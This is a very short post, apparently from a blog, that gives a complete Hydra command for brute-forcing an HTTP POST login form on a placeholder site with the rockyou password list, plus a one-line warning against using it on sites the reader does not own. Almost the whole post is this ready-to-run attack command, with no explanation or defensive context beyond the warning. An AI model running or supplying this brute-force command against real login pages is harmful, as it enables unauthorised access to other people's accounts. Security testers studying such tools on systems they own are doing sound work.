Example of Hydra command line arguments that seem to be running through the iterations.
sudo hydra -l myusername -P /usr/share/dict/rockyou.txt -o output.txt thetarget.com http-post-form "/login.cfm RetURL=%2FDefault%2Easp%3F:login_name=^USER^&password=^PASS^:S=logout myusername" -vV -f
Do not let this run through completion or to success if target.com is not a website that you own, unless you want to go to jail.
No comments:
Post a Comment